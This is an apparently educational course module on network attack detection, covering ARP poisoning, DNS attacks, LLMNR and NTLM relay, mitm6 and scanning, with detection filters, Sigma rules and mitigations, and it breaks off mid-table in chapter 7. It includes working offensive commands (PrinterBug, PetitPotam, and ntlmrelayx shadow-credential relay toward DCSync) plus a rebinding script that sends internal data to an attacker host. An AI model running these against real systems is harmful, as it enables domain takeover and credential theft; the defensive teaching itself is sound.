Lucent Grid Learning · Advanced Networking

Network Attack
Detection

A protocol-depth examination of how network attacks work at the packet level — and what they leave behind for defenders. Ten chapters covering the mechanics beneath the tools, the traffic signatures that expose each attack class, and the detection rules and forensic techniques that find them.

10 chapters

~2 hrs reading

Advanced level

Red & Blue perspective

⚠ Prerequisites and Scope

This module is a protocol-depth companion to two other Lucent Grid learning modules. It assumes you are already familiar with the practical tool workflows covered in Penetration Testing and the protocol foundations covered in Networking. Where those modules covered what the tools do, this module covers why the protocols are vulnerable — the packet-level mechanics, the cryptographic structures, and the traffic signatures that each attack class produces.

Some topics — LLMNR poisoning, NTLM relay, network scanning, lateral movement — are covered in abbreviated form in those modules. The treatment here is intentionally deeper and assumes that prior context. You will get the most from this module if you have worked through those sections first, or have equivalent practical experience.

Networking → Penetration Testing →

Chapter 01 · ~10 min Protocol Depth

Attacks in the Protocol Stack

The OSI model as an attack surface map, why lower-layer attacks are harder to detect, trust assumptions baked into protocols, and the attacker's view of the stack

Every network attack exploits a trust assumption that a protocol made about the environment it would run in. ARP assumed all hosts on a segment are trustworthy. DNS assumed resolvers would only answer accurately. LLMNR assumed that if a name can't be resolved, any host on the network willing to answer must know the truth. These assumptions were reasonable in the environments the protocols were designed for — isolated LANs, university networks, trusted intranets. They are catastrophically wrong in adversarial environments.

Understanding which layer of the stack an attack operates at is not merely academic. Layer 2 attacks (ARP poisoning) can intercept traffic before any Layer 3 security control sees it. Layer 3/4 attacks can bypass application-layer inspection. The deeper the attack in the stack, the fewer defensive controls are positioned to observe it — most security tooling operates at Layer 7.

The Attack Surface by OSI Layer

Layer 7 — Application HTTP, DNS, SMTP, SMB, LDAP, Kerberos Most security tooling operates here (WAF, proxy, SIEM rules) Attacks: DNS poisoning, NTLM relay, Kerberoasting Layer 5/6 — Session/Pres TLS, RPC, NetBIOS Encryption here blinds Layer 7 inspection without TLS intercept Attacks: SSL stripping, TLS downgrade, certificate spoofing Layer 4 — Transport TCP, UDP Stateful inspection at this layer; connection tracking Attacks: TCP RST injection, SYN flood, port scanning Layer 3 — Network IP, ICMP, routing protocols (BGP, OSPF) Routers operate here; inter-VLAN traffic visible Attacks: IP spoofing, ICMP tunnelling, BGP hijacking Layer 2 — Data Link Ethernet, ARP, 802.1Q VLAN, 802.1X Switches operate here; SPAN ports for capture Attacks: ARP poisoning, MAC flooding, VLAN hopping ← Most orgs have weakest detection at this layer

Why Layer 2 Is the Blind Spot

Most enterprise security monitoring is built around Layer 3 and above. Firewalls inspect IP packets. IDS/IPS inspect TCP streams and application-layer payloads. SIEM rules correlate authentication events, DNS queries, and HTTP requests. The switch fabric — Layer 2 — is largely invisible to all of these controls.

ARP poisoning, MAC flooding, and VLAN hopping all operate at Layer 2. They generate no IP traffic before achieving their objective. A network with comprehensive Layer 7 logging but no Layer 2 security controls (dynamic ARP inspection, port security, 802.1X) has a significant blind spot that attackers who understand the stack can exploit silently.

Protocol Trust Assumptions — A Taxonomy

Protocol	Layer	Trust Assumption	Attack That Breaks It
ARP	2	Any host can answer an ARP request authoritatively; last answer wins	ARP poisoning / gratuitous ARP flooding
DHCP	3/7	First DHCP offer received is legitimate; DHCP server is authoritative	Rogue DHCP server; DHCP starvation
DNS	7	Resolvers answer honestly; transaction IDs are unpredictable; UDP is sufficient	Cache poisoning; DNS tunnelling; Kaminsky attack
LLMNR/NBT-NS	7	Any host claiming to know a hostname on the local segment can be trusted	Responder poisoning; NTLMv2 capture
NTLM	7	The server sending the challenge is the intended destination	NTLM relay; pass-the-hash
BGP	3/7	Peers announcing routes are authorised to originate those prefixes	BGP hijacking; route injection
IPv6 SLAAC	3	Router Advertisement messages come from legitimate routers	Rogue RA; mitm6 DHCPv6 abuse

The Attacker's View: Horizontal and Vertical Movement

Network attacks serve two objectives in an engagement. Horizontal movement — using network-level attacks to move laterally between systems at the same privilege level (ARP poisoning for traffic interception, LLMNR poisoning for credential capture). Vertical movement — using captured credentials or relay attacks to escalate privileges (NTLM relay to LDAP, Kerberoasting via the network, DCSync over the replication protocol).

The protocol stack determines both what is possible and what is visible. An attacker who understands where monitoring is deployed can choose the attack layer that produces the least observable signal. A defender who understands the same landscape can position sensors at the layers that are currently blind.

Key Takeaways — Chapter 1

Every network attack exploits a trust assumption the protocol made about its operating environment — identifying the assumption identifies the fix
Layer 2 is the most common blind spot in enterprise security monitoring — most detection tooling operates at Layer 3 and above
The lower the attack in the stack, the fewer security controls are positioned to observe it — depth in the stack translates to detection difficulty
Protocol trust assumptions were reasonable for isolated LANs; they are exploitable in any environment where an attacker has achieved local network access

Chapter 02 · ~11 min Protocol Depth

ARP Poisoning and Layer 2 Attacks

ARP protocol mechanics, the cache poisoning sequence at the packet level, MITM positioning, VLAN hopping, MAC flooding, and switch-level defences

ARP — the Address Resolution Protocol — is how Layer 2 and Layer 3 are bridged. When a host wants to send an IP packet to another host on the same subnet, it first needs the destination's MAC address. ARP resolves that mapping. The protocol was designed in 1982 for a trusted network environment and has no authentication whatsoever. Any host on the segment can send an ARP reply for any IP address, and the receiving host will update its cache accordingly.

The ARP Protocol in Full

Legitimate ARP Resolution — Request and Reply

Host A (10.0.0.5, MAC: aa:bb:cc:11:22:33) wants to reach Host B (10.0.0.10) Host A ──────── ARP Request (broadcast) ────────► FF:FF:FF:FF:FF:FF Who has 10.0.0.10? Tell 10.0.0.5 Ethernet dst: ff:ff:ff:ff:ff:ff (broadcast — every host receives) ARP opcode: 1 (request) Sender MAC: aa:bb:cc:11:22:33 Target MAC: 00:00:00:00:00:00 (unknown) Host B ──────── ARP Reply (unicast) ────────────► Host A 10.0.0.10 is at dd:ee:ff:44:55:66 ARP opcode: 2 (reply) Sender MAC: dd:ee:ff:44:55:66 ← Host B's real MAC Host A caches: 10.0.0.10 → dd:ee:ff:44:55:66 (stored for ~20 min)

ARP Poisoning — Attacker Intercepts Traffic Between A and B

Attacker (10.0.0.99, MAC: 00:11:22:aa:bb:cc) — unsolicited gratuitous ARP replies Attacker ────── Gratuitous ARP Reply ─────────────► Host A "10.0.0.10 is at 00:11:22:aa:bb:cc" ← Attacker's MAC for Host B's IP Unsolicited — no request needed Host A updates cache: 10.0.0.10 → 00:11:22:aa:bb:cc ← POISONED Attacker ────── Gratuitous ARP Reply ─────────────► Host B "10.0.0.5 is at 00:11:22:aa:bb:cc" ← Attacker's MAC for Host A's IP Host B updates cache: 10.0.0.5 → 00:11:22:aa:bb:cc ← POISONED Now: Host A → Host B traffic goes to Attacker first (Attacker forwards it to maintain session) Host B → Host A traffic goes to Attacker first Attacker reads, optionally modifies, then forwards → transparent MITM

What an Attacker Captures in MITM Position

Once in MITM position, the attacker's NIC is in promiscuous mode, forwarding traffic between the real hosts while capturing everything. What this exposes depends on the protocols in use:

Unencrypted protocols — HTTP, FTP, SMTP, POP3, Telnet, older SMBv1 — everything is visible in cleartext. Credentials, session cookies, file transfers, emails.
TLS-encrypted protocols — the attacker sees encrypted blobs but can attempt SSL stripping (downgrading HTTPS to HTTP by intercepting the initial redirect) against targets without HSTS.
NTLM challenge-response — SMB, HTTP NTLM, and other Windows authentication protocols send a challenge-response that the attacker can capture for offline cracking or relay.
Kerberos tickets — AS-REQ and TGS-REQ packets transit the network and can be captured for offline cracking (AS-REP Roasting targets) or relay.

Detecting ARP Poisoning

-- Show all ARP traffic arp -- Find ARP replies that weren't preceded by a request (gratuitous) arp.opcode == 2 && arp.isgratuitous == 1 -- Detect duplicate IP — two different MACs claiming same IP arp.duplicate-address-detected -- High-rate ARP replies from one source (flooding indicator) arp.opcode == 2 && eth.src == 00:11:22:aa:bb:cc

Wireshark / tsharkIdentifying ARP poisoning in a packet capture

$ tshark -r capture.pcap -Y "arp" -T fields -e eth.src -e arp.src.hw_mac -e arp.src.proto_ipv4 | sort | uniq -c | sort -rn 1 dd:ee:ff:44:55:66 dd:ee:ff:44:55:66 10.0.0.10 ← legitimate Host B 1 aa:bb:cc:11:22:33 aa:bb:cc:11:22:33 10.0.0.5 ← legitimate Host A 847 00:11:22:aa:bb:cc 00:11:22:aa:bb:cc 10.0.0.10 ← 847 replies claiming to be Host B's IP! 847 00:11:22:aa:bb:cc 00:11:22:aa:bb:cc 10.0.0.5 ← same MAC claiming to be Host A's IP! Two different IPs answered by the same MAC → classic ARP poisoning signature MAC 00:11:22:aa:bb:cc is positioning itself between 10.0.0.5 and 10.0.0.10

Switch-Level Defences

Dynamic ARP Inspection (DAI) — switch feature that validates ARP packets against a trusted DHCP snooping binding table. If the MAC/IP pair in an ARP reply doesn't match the binding table, the packet is dropped. Eliminates ARP poisoning when DHCP snooping is also enabled.
Port security — limits the number of MAC addresses permitted on a switch port. Prevents MAC flooding attacks (which fill the switch's CAM table, causing it to broadcast all frames).
802.1X port authentication — requires hosts to authenticate before being granted network access at the switch level. An attacker with physical access but no valid credentials is blocked at Layer 2.
Private VLANs (PVLANs) — prevent Layer 2 communication between hosts in the same VLAN. Hosts can only communicate via the router, which logs the traffic. Eliminates ARP poisoning between hosts in the same segment.

Key Takeaways — Chapter 2

ARP has no authentication — any host can send a gratuitous ARP reply claiming any IP, and receiving hosts will update their cache without verification
ARP poisoning produces two signatures: a single MAC address claiming multiple IPs, and a high rate of unsolicited ARP replies from one source
Wireshark's arp.duplicate-address-detected filter surfaces poisoning automatically — tshark one-liners can extract the anomaly from large captures
Dynamic ARP Inspection (DAI) on the switch validates ARP against the DHCP binding table and drops spoofed replies before they reach hosts
MITM position via ARP poisoning exposes all unencrypted traffic and enables SSL stripping against non-HSTS connections

Chapter 03 · ~12 min Protocol Depth

DNS Attacks and Abuse

The Kaminsky cache poisoning attack, DNS tunnelling mechanics and detection, DNS-based C2 beaconing patterns, DGA detection, and DNS rebinding

DNS is the directory service of the internet — and one of the most abused protocols in offensive security. Because DNS traffic is nearly universally permitted through firewalls (port 53 outbound is almost always open), it is the protocol of choice for covert channels, C2 beaconing, and data exfiltration. Understanding both why DNS is vulnerable and what abuse looks like in traffic enables detection that signature-based tools frequently miss.

The Kaminsky Attack — Cache Poisoning Mechanics

DNS cache poisoning injects forged records into a resolver's cache, redirecting queries for a legitimate domain to an attacker-controlled IP. The Kaminsky attack (2008) demonstrated that this was practical at scale by exploiting predictable transaction IDs and the ability to flood the resolver with forged responses.

Kaminsky Cache Poisoning — The Mechanics

Goal: inject a forged A record for bank.com into the resolver's cache Attacker ──── Query ────────────────────────────► Resolver "What is the IP of random123.bank.com?" Subdomains force a fresh upstream query each time (cache miss guaranteed) Resolver ──── Query (UDP, src port random) ──────► bank.com NS Transaction ID: 0x4A2F (16-bit, only 65536 possible values) Source port: 54821 (additional entropy — but historically predictable) Attacker ──── Flood forged responses ─────────────► Resolver 65536 UDP packets, each with a different TxID, all claiming: "random123.bank.com → 1.2.3.4 (attacker IP)" AND: "authoritative NS for bank.com → attacker-controlled NS" If ANY forged packet arrives before the real response with matching TxID: Resolver caches: bank.com NS → attacker's NS All future queries for *.bank.com answered by attacker Fix: DNSSEC — NS signs all records; forged responses fail signature validation Fix: Source port randomisation — increases entropy from 16 to ~32 bits

DNS Tunnelling — Data Encoding in Queries

DNS tunnelling encodes arbitrary data into DNS queries and responses, creating a covert channel through firewalls that permit DNS. Tools like iodine, dnscat2, and DNS2TCP implement full IP-over-DNS or shell-over-DNS. The fundamental technique is the same: data is base32/base64 encoded and embedded in subdomain labels of a query to an attacker-controlled domain.

DNS TunnellingWhat iodine tunnel traffic looks like in a capture

Normal DNS query: Query: www.google.com A (12 bytes in QNAME) Response: 142.250.185.46 TTL: 300 DNS tunnel query (iodine encoding data in subdomains): Query: aabbccddee112233445566778899aabbccdd.t.attacker.com TXT ← 36-char hex-encoded data payload in subdomain label Response: "aabbccdd00112233445566778899" TXT record ← response data encoded in TXT record content Detection signatures in DNS tunnel traffic: • QNAME length: normal avg 30 chars; tunnels avg 60-200+ chars • Query rate: normal 1-5/min; tunnels 50-500+/min to same domain • Unique subdomains: normal sites have few; tunnels have thousands • TXT/NULL/CNAME query types: tunnels use these far more than browsers • Entropy: tunnel subdomains are high-entropy (random chars) • No matching web traffic to same domain

Sigma RuleDNS Tunnelling Detection — High-Entropy Subdomains

title: DNS Tunnelling — Suspicious Query Characteristics status: stable description: Detects DNS queries with characteristics of tunnelling tools detection: selection: EventID: 3006 # DNS Client query log QueryName|re: # Subdomain longer than 50 chars - '^[a-zA-Z0-9]{50,}\.' # High-entropy hex-like subdomains - '^[a-f0-9]{30,}\.' # Base32 encoded subdomains (iodine) - '^[a-z2-7]{40,}\.' filter_legit: QueryName|contains: - '.msftncsi.com' - '.windows.com' condition: selection and not filter_legit falsepositives: - CDN edge nodes with long hashed subdomains level: medium

DNS Rebinding — Bypassing Same-Origin Policy

DNS rebinding is a technique that bypasses the same-origin policy and SSRF server-side filters by exploiting the gap between DNS resolution and subsequent use. The attack works by controlling a domain whose DNS TTL is extremely short, then changing the DNS record between the security check and the actual network request.

DNS Rebinding — SSRF Filter Bypass Sequence

Victim browser visits attacker.com Browser ── DNS query ──────────────────────────► Attacker NS NS responds: attacker.com → 1.2.3.4 TTL: 1 second Browser loads page from 1.2.3.4 (legitimate public server) Page contains JavaScript that waits 2 seconds then fetches: fetch("http://attacker.com/internal-resource") Browser ── DNS query (TTL expired) ─────────────► Attacker NS NS now responds: attacker.com → 192.168.1.1 (internal router!) Browser's same-origin check: same domain? Yes (attacker.com). Proceeds. Browser fetches http://192.168.1.1/ — reads internal router admin panel JavaScript sends contents back to attacker's real server Defence: DNS rebinding protection in resolvers (reject private IPs for public domains) Defence: Use IMDSv2 (requires PUT token) for AWS metadata Defence: Bind sensitive services to localhost only, not 0.0.0.0

Key Takeaways — Chapter 3

The Kaminsky attack made DNS cache poisoning practical by forcing cache misses via random subdomains and flooding with 65536 forged responses — DNSSEC and source port randomisation are the fixes
DNS tunnelling detection relies on statistical analysis of query patterns — QNAME length, query rate, unique subdomain count, and entropy — not signatures
DNS rebinding exploits the gap between DNS resolution and request execution — a 1-second TTL allows the attacker to change the IP between the security check and the actual fetch
DNS is almost universally permitted outbound — it is therefore the protocol of choice for C2, exfiltration, and covert channels in restricted network environments
DNSSEC signs DNS responses; RPKI signs BGP route announcements — both address the same root problem (unauthenticated protocol) at different layers

Chapter 04 · ~11 min Protocol Depth

LLMNR, NBT-NS, and mDNS Poisoning

The Windows name resolution fallback chain, the NTLMv2 challenge-response structure, what Responder traffic looks like at the packet level, and disabling the protocols via GPO

The Penetration Testing module shows you how to run Responder and what hashes it captures. This chapter explains why those hashes appear — the complete protocol chain that runs between a Windows host failing DNS resolution and an NTLMv2 response arriving in Responder's output. Understanding this chain is what lets you detect, prevent, and explain the vulnerability to network engineers who have never run a pentest tool.

The Windows Name Resolution Chain

When a Windows machine needs to resolve a hostname, it doesn't immediately broadcast to the network. It follows a prioritised sequence of resolution methods, falling back to less secure options only when earlier ones fail:

Windows Name Resolution — Full Fallback Sequence

Windows host wants to resolve FILESERVER01 Step 1: Check local hosts file C:\Windows\System32\drivers\etc\hosts → Hit: returns immediately. Logged nowhere. → Miss: continue Step 2: Check local DNS cache (ipconfig /displaydns) → Hit: returns immediately. → Miss: continue Step 3: Query configured DNS server (corporate DNS) → Hit: returns A record. → Miss: DNS NXDOMAIN response → continue to fallbacks Step 4: LLMNR broadcast (UDP port 5355, multicast 224.0.0.252) "Who knows FILESERVER01?" → sent to entire local segment → Attacker (Responder) responds: "I am FILESERVER01" Windows trusts this response — begins authenticating to attacker Step 5: NBT-NS broadcast (UDP port 137, broadcast 255.255.255.255) Legacy NetBIOS name resolution — even older, even less secure → Attacker (Responder) responds: "I am FILESERVER01" Step 6: mDNS (UDP port 5353, multicast 224.0.0.251) Used by some applications; same poisoning attack applies

The NTLMv2 Challenge-Response — What Gets Captured

When Windows connects to what it believes is FILESERVER01 (actually Responder), it initiates NTLM authentication. The NTLMv2 exchange produces a response that depends on the user's password hash and the server's challenge. The attacker captures this response and can crack it offline.

NTLMv2 Authentication Exchange — What Responder Captures

Windows Client Responder (fake server) Client ──── NEGOTIATE_MESSAGE ────────────────────► Responder Flags: NTLM, NTLMv2, signing negotiation Responder ─── CHALLENGE_MESSAGE ─────────────────────► Client ServerChallenge: 8 random bytes (e.g. 0x4a6f686e536d6974) Responder records this challenge Client ──── AUTHENTICATE_MESSAGE ─────────────────► Responder Username: ACME\john.smith NTLMv2 Response: ClientChallenge: 8 more random bytes NTProofStr = HMAC-MD5(NT_hash, ServerChallenge || ClientChallenge || timestamp || ...) ← this is what appears in Responder output The NTProofStr cannot be used directly — it must be cracked hashcat -m 5600 captures.txt rockyou.txt Success iff password is in wordlist — not all passwords crack Why relay is more powerful: relay forwards the challenge-response live to a real target server — no cracking required, no password needed

What This Looks Like in a Packet Capture

-- Show all LLMNR traffic udp.port == 5355 -- Show all NBT-NS traffic udp.port == 137 -- Find LLMNR responses (should be very rare in healthy networks) udp.port == 5355 && dns.flags.response == 1 -- Find hosts sending many LLMNR responses (Responder signature) udp.port == 5355 && dns.flags.response == 1 && ip.src == ATTACKER_IP -- Detect NTLM authentication following an LLMNR response ntlmssp && ntlmssp.messagetype == 0x00000003

Disabling the Protocols — GPO Configuration

Group PolicyDisabling LLMNR and NBT-NS domain-wide — the only real fix

Disable LLMNR via Group Policy: Computer Configuration → Administrative Templates → Network → DNS Client → Turn off multicast name resolution → Enabled Disable NBT-NS via DHCP scope options: DHCP Scope Options → 043 Vendor Specific → set Node Type to 0x2 (P-node) P-node = point-to-point (DNS only) — no broadcasts Or disable NBT-NS per-NIC via registry: HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\ NetbiosOptions = 2 (disable NetBIOS over TCP/IP) Verify: check that no LLMNR traffic appears on the segment after GPO applies $ tshark -i eth0 -Y "udp.port == 5355" -a duration:60 0 packets captured ← LLMNR disabled successfully

Key Takeaways — Chapter 4

LLMNR and NBT-NS fire only when DNS fails — the attack requires either a DNS failure (typo, missing record) or a direct query for a non-existent hostname
The NTLMv2 response contains a HMAC-MD5 over the server challenge, client challenge, and timestamp — it can be cracked offline but only succeeds if the password appears in a wordlist
Relay attacks forward the challenge-response live to a real target — they don't require cracking, making them categorically more powerful than offline hash capture
Detection: LLMNR responses should be rare to nonexistent in a healthy network — any host sending frequent LLMNR responses on port 5355 warrants investigation
Disabling LLMNR via GPO and NBT-NS via DHCP or registry eliminates the entire attack class — it is a two-setting configuration change with no meaningful operational impact on modern networks

Chapter 05 · ~13 min Protocol Depth

NTLM, Relay, and Coercion

The NTLM protocol in full, why relay is possible, SMB signing as the fix, coercion techniques (PrinterBug, PetitPotam, DFSCoerce), relay to LDAP, and detection via Event IDs

NTLM relay is arguably the highest-impact network attack class in Active Directory environments. Where passive credential capture (Responder) requires a victim to make an error, coercion-based relay forces authenticated connections from any domain-joined host — including domain controllers — to the attacker's machine. Understanding the cryptographic structure of NTLM explains precisely why relay is possible and exactly what signing prevents.

The NTLM Protocol — Full Cryptographic Structure

NTLMv2 — Three-Message Exchange and Why Relay Works

Normal flow: Client → Target Server Client ──── Type 1: NEGOTIATE ──────────────────────► Server Client announces supported NTLM features/flags Server ──── Type 2: CHALLENGE ──────────────────────► Client ServerChallenge: random 8 bytes ServerFlags: signing, sealing, NTLM version Client ──── Type 3: AUTHENTICATE ───────────────────► Server Username, Domain, Workstation NT_hash = MD4(UTF-16LE(password)) NTProofStr = HMAC-MD5(NT_hash, SC||CC||time||...) Blob = NTProofStr || ClientChallenge || timestamp ──────────────────────────────────────────────────────── The relay insight: nothing in the Type 3 message binds it to the intended server. The ServerChallenge came from the server and was used in the computation — but who sent that challenge is not authenticated. The attacker can substitute their own challenge and forward the Type 3 response to a real target. Relay flow: Client → Attacker → Real Target Client ──── Type 1 ─────────────────────────────────► Attacker Attacker ── Type 1 ─────────────────────────────────► Target Target ──── Type 2 (challenge) ─────────────────────► Attacker Attacker ── Type 2 (same challenge) ──────────────────► Client Client computes NTProofStr using Target's challenge Client ──── Type 3 (NTProofStr) ────────────────────► Attacker Attacker ── Type 3 (forwarded) ───────────────────────► Target Target validates NTProofStr — correct! Authenticates client to attacker.

Why SMB Signing Breaks Relay

SMB signing cryptographically authenticates every SMB message using a session key derived from the user's NT hash. If an attacker relays a Type 3 message to a server with signing required, that server will demand that subsequent messages are signed — but the attacker doesn't have the session key (which requires knowing the NT hash), so they cannot produce valid signatures. The relay succeeds at the authentication step but every subsequent command fails signature verification.

The Session Key Problem

The session key for SMB signing is derived as: HMAC-MD5(NT_hash, NTProofStr). The attacker who relayed the authentication has the NTProofStr (it passed through them) but not the NT_hash (the user's password hash). Without the NT_hash, they cannot compute the session key and cannot sign any subsequent messages. This is why signing is the effective control — it makes the authenticated session useless to a relaying attacker.

Coercion — Forcing Authentication Without Waiting

Passive relay (waiting for LLMNR broadcasts) requires the attacker to be on the same network segment and wait for a victim to make a name resolution error. Coercion techniques actively force domain computers — including domain controllers — to authenticate to the attacker on demand. This is a fundamentally different threat model.

Coercion TechniquesPrinterBug, PetitPotam, DFSCoerce — forcing DC authentication

PrinterBug (MS-RPRN) — forces any domain computer to authenticate: $ python3 printerbug.py ACME/john.smith:'Summer2023!'@DC01.acme.local 10.10.14.5 [*] Connecting to DC01.acme.local [*] Bound to spoolss [+] Triggered — DC01$ is now authenticating to 10.10.14.5 Requires: domain user account (any). Affects: all unpatched Windows with Print Spooler PetitPotam (MS-EFSRPC) — forces DC to authenticate without credentials: $ python3 PetitPotam.py 10.10.14.5 DC01.acme.local [+] DC01$ is now authenticating to 10.10.14.5 as ACME\DC01$ Requires: unauthenticated access to MS-EFSRPC (partially patched — requires auth in some configs) On the attacker's machine simultaneously (ntlmrelayx to LDAPS): $ sudo ntlmrelayx.py -t ldaps://DC01.acme.local --shadow-credentials --shadow-target DC01$ [*] AUTHENTICATE_MESSAGE (ACME\DC01$,DC01) [*] Relaying to ldaps://DC01.acme.local [+] Shadow credentials added for DC01$ — can now get TGT for DC01$ → DCSync → all hashes

Detection via Windows Event IDs

Event ID	Log	Description	Relevance
4624	Security	Successful logon	Logon Type 3 (network) from unexpected sources; logons from machine accounts (DC$) to unusual targets
4625	Security	Failed logon	High rate of Type 3 failures from single source = relay attempt or spray
4648	Security	Logon with explicit credentials	Indicates pass-the-hash or runas — machine account authenticating interactively
5140	Security	Network share access	Machine accounts (DC$, WS$) accessing shares they normally wouldn't
4768	Security	Kerberos TGT request	TGTs requested for machine accounts from unexpected IPs

Sigma RuleNTLM Relay — Machine Account Authenticating to Non-DC

title: Potential NTLM Relay — Machine Account Network Logon description: Machine account (ending in $) authenticating via NTLM to a non-DC host detection: selection: EventID: 4624 LogonType: 3 # Network logon AuthenticationPackageName: 'NTLM' TargetUserName|endswith: '$' # Machine accounts filter_dc: IpAddress|contains: # Exclude DC IPs - '10.10.10.1' - '10.10.10.2' condition: selection and not filter_dc level: high

Key Takeaways — Chapter 5

NTLM relay is possible because nothing in the Type 3 AUTHENTICATE message binds it to the intended server — the challenge from any server produces a valid response that any server will accept
SMB signing breaks relay because the attacker cannot compute the session key (requires the NT hash they don't have) and therefore cannot sign subsequent messages
Coercion (PrinterBug, PetitPotam, DFSCoerce) forces authentication on demand from any domain computer — making relay independent of victim error or network position
Relay to LDAP with shadow credentials or RBCD achieves full domain compromise from a single coerced DC authentication
Detection: Event ID 4624 Logon Type 3 with NTLM from machine accounts (ending in $) to non-DC hosts is a high-fidelity indicator of relay activity

Chapter 06 · ~11 min Protocol Depth

IPv6 Attacks and Modern Network Abuse

Why "we don't use IPv6" is wrong, SLAAC and DHCPv6 mechanics, the mitm6 attack chain, what IPv6 attack traffic looks like, and detection and mitigation

The most common response to the mitm6 attack is "but we don't use IPv6." This misunderstands the threat. The attack doesn't require the organisation to have deployed IPv6. It only requires Windows — which, by default, prefers IPv6 over IPv4 and sends DHCPv6 solicits periodically even on IPv4-only networks. An attacker who understands this can often achieve MITM position and NTLM relay on networks that have never consciously touched IPv6 configuration.

SLAAC and DHCPv6 — The Protocols Being Abused

IPv6 Stateless Address Autoconfiguration (SLAAC) allows hosts to configure their own IPv6 addresses based on Router Advertisement (RA) messages sent by routers. DHCPv6 provides stateful IPv6 address assignment. Both use multicast: RA messages go to ff02::1 (all nodes), DHCPv6 solicits go to ff02::1:2 (all DHCPv6 agents). Any host on the segment can send these messages.

mitm6 Attack Chain — From DHCPv6 to NTLM Relay

Windows periodically sends DHCPv6 SOLICIT to ff02::1:2 (multicast) even on IPv4-only networks — this is normal Windows behaviour Windows ── DHCPv6 SOLICIT ────────────────────────► ff02::1:2 "I need an IPv6 address and DNS server" mitm6 ──── DHCPv6 ADVERTISE ──────────────────────► Windows IPv6 address: fd00::1abc/128 (attacker assigns it) DNS server: fd00::1 (attacker's machine) Windows now has IPv6 connectivity and uses attacker as DNS Windows ── DNS query (IPv6) ──────────────────────► mitm6 DNS "WPAD.acme.local?" / "DC01.acme.local?" mitm6 responds: "WPAD → fd00::1 (me)" Windows ── HTTP CONNECT to WPAD ─────────────────► mitm6/ntlmrelayx Sends NTLM authentication automatically ntlmrelayx relays to DC01 via LDAP/SMB Why this beats LLMNR poisoning: • No DNS failure needed — Windows actively solicits DHCPv6 • Works on networks with working DNS • WPAD forces immediate authentication from ALL domain hosts • Operates on ALL Windows hosts simultaneously, not just misconfigured ones

What mitm6 Traffic Looks Like

-- Show DHCPv6 traffic (should be absent on IPv4-only networks) udp.port == 546 || udp.port == 547 -- Show Router Advertisement messages icmpv6.type == 134 -- Find unexpected RA sources (should only come from known routers) icmpv6.type == 134 && !eth.src == ROUTER_MAC -- Find DHCPv6 ADVERTISE responses (attacker responding to SOLICITs) udp.port == 547 && dhcpv6.msgtype == 2

Mitigation

Block DHCPv6 on switches — deploy DHCP Guard / RA Guard on switch ports to drop DHCPv6 Advertise and Router Advertisement messages from non-authorised ports. This is the switch-level equivalent of DHCP snooping for IPv4.
Disable IPv6 where not needed — via GPO: Computer Configuration → Administrative Templates → Network → TCPIP Settings → Disable IPv6 components. Prevents Windows from sending DHCPv6 SOLICITs entirely.
Disable WPAD — the Web Proxy Auto-Discovery protocol is the mechanism that triggers automatic NTLM authentication. Disable via GPO or set the WpadOverride registry key. Remove the WPAD DNS entry if it exists.
Enable LDAP signing and channel binding — even if relay occurs, LDAP signing prevents the relayed session from being used for LDAP writes (the objective of the ntlmrelayx LDAP relay chain).

Key Takeaways — Chapter 6

Windows sends periodic DHCPv6 SOLICITs even on IPv4-only networks — "we don't use IPv6" does not prevent mitm6
mitm6 is more powerful than LLMNR poisoning because it doesn't require DNS failures — it works on networks with fully functioning DNS
The WPAD mechanism forces automatic NTLM authentication from all Windows hosts — disabling WPAD eliminates the primary authentication trigger for mitm6
RA Guard and DHCP Guard on switches prevent unauthorised DHCPv6 Advertise and Router Advertisement messages from reaching hosts
The complete mitigation stack: disable IPv6 if unused (GPO), disable WPAD (GPO), enable RA/DHCP Guard (switch), enable LDAP signing (DC policy), enable SMB signing (GPO)

Chapter 07 · ~11 min Protocol Depth

Network Scanning, Evasion, and Fingerprinting

What nmap is doing at the packet level, TCP state machine mechanics, OS fingerprinting via stack behaviour, evasion techniques and their signatures, and detecting scans in logs

The Penetration Testing module shows nmap flags and their outputs. This chapter shows what those flags produce at the wire level — which packets are sent, what responses are expected, and why the TCP state machine's behaviour differs between open, closed, and filtered ports. This is the knowledge that lets you write IDS rules that detect scanning despite evasion, because you understand what the evasion is actually doing.

The TCP State Machine — What nmap Exploits

nmap SYN Scan (-sS) — Port State Determination

nmap sends a single SYN packet to each port Scenario A — Port OPEN nmap ──── SYN ────────────────────────────────► Target:80 Target ──── SYN/ACK ─────────────────────────────► nmap SYN/ACK received → port is OPEN (service listening) nmap ──── RST ────────────────────────────────► Target:80 RST immediately — never completes handshake (stealth) No connection logged by application; TCP logs may show half-open Scenario B — Port CLOSED nmap ──── SYN ────────────────────────────────► Target:8888 Target ──── RST/ACK ─────────────────────────────► nmap RST/ACK → port CLOSED (OS responded, nothing listening) This is the TCP stack responding, not an application Scenario C — Port FILTERED nmap ──── SYN ────────────────────────────────► Target:22 No response / ICMP unreachable Timeout → port FILTERED (firewall dropping packets) nmap retransmits twice before declaring filtered

OS Fingerprinting — TCP Stack Behaviour Differences

Different operating systems implement the TCP/IP stack differently — initial TTL values, TCP window sizes, IP flags, ICMP response behaviour, and TCP options in SYN packets all vary by OS and version. nmap's -O flag collects these values and compares them against a fingerprint database of thousands of OS/version combinations.

OS Fingerprinting SignaturesTCP/IP stack characteristics that identify OS — what nmap -O measures

Characteristic Linux 5.x Windows 10/11 macOS 13 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Initial TTL 64 128 64 TCP Window Size 29200 65535 65535 TCP Options (SYN) MSS,SACK,TS,NOP MSS,NOP,NOP,SACK MSS,NOP,WS,NOP,NOP,TS IP DF bit Set Set Set ICMP echo response TTL decremented TTL decremented TTL decremented ICMP error quoting 8 bytes 8 bytes 8 bytes nmap -O output: OS details: Linux 5.4 - 5.15 (94%) Passive fingerprinting (p0f) — no packets sent: Analyzes TCP headers in normal traffic to identify OS Can fingerprint OS of machines that never communicate with you p0f output: [10.0.0.50] Windows 10 1903-21H2, IE 11

Scan Evasion Techniques and Their Signatures

Evasion Technique	nmap Flag	Mechanism	IDS Signature Despite Evasion
Timing reduction	`-T1` / `-T0`	Slows scan to evade rate-based detection	Still produces SYN packets to sequential ports — just slower. Threshold detection fails; pattern detection still works.
IP fragmentation	`-f`	Splits TCP header across multiple fragments — some IDS can't reassemble	High fragmentation rate from single source; tiny fragments (8 bytes) are unusual
